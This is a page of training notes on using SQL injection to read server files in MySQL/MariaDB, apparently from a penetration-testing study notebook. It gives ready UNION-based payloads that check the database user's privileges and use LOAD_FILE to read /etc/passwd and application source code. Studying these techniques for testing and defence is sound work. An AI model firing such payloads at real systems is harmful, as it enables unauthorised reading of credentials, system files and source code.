LinkedInGitHub

Reading Files

The ability to read files on a server represents a significant security risk. Attackers can exploit SQLi vulnerabilities not only to extract data from databases but also to access sensitive files stored on the server. This capability often hinges on the privileges assigned to the database user. For instance, in systems like MySQL, the FILE privilege is required to read or write files. By leveraging SQLi techniques, such as UNION queries and functions like LOAD_FILE(), an attacker can potentially gain access to critical system files, application source code, and sensitive information, such as database credentials. Understanding this aspect of SQLi is essential for identifying vulnerabilities and implementing effective security measures to safeguard against unauthorized file access

Overview of SQL Injection

  • SQL Injection (SQLi) can be used not only to extract data from databases but also to read/write files on the server and potentially achieve remote code execution.

User Privileges

  • Reading vs. Writing: Reading data is common; writing is restricted to privileged users to prevent exploitation.

  • MySQL FILE Privilege: To read/write files, the database user must have the FILE privilege.

  • Determine Current User: Use the following queries to identify the current database user:

    • SELECT USER()

    • SELECT CURRENT_USER()

    • SELECT user FROM mysql.user

  • Example UNION Injection:

    • cn' UNION SELECT 1, user(), 3, 4-- -

    • This helps identify if the user is a DBA (e.g., root).

Checking User Privileges

  • Super Admin Privileges: Check for super admin privileges with:

    • SELECT super_priv FROM mysql.user

  • Example Payload:

    • cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -

  • Dumping Privileges: To see all privileges:

    • cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -

  • Identifying FILE Privilege: If the FILE privilege is present, we can read/write files.

Reading Files with LOAD_FILE

  • Using LOAD_FILE(): This function reads data from files in MariaDB/MySQL.

    • Example to read /etc/passwd:

      • SELECT LOAD_FILE('/etc/passwd');

  • Example UNION Injection for File Reading:

    • cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -

  • Accessing Application Source Code: Attempt to read the source code of search.php:

    • cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -

    • The HTML code can be viewed in the browser (Ctrl + U).

Conclusion

  • SQL Injection can be a powerful tool for accessing sensitive information if proper privileges are not enforced. Understanding user privileges and leveraging functions like LOAD_FILE can expose critical data, including application source code and database credentials. Always ensure robust security measures are in place to mitigate these risks.

PreviousDatabase EnumerationNextLab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

Last updated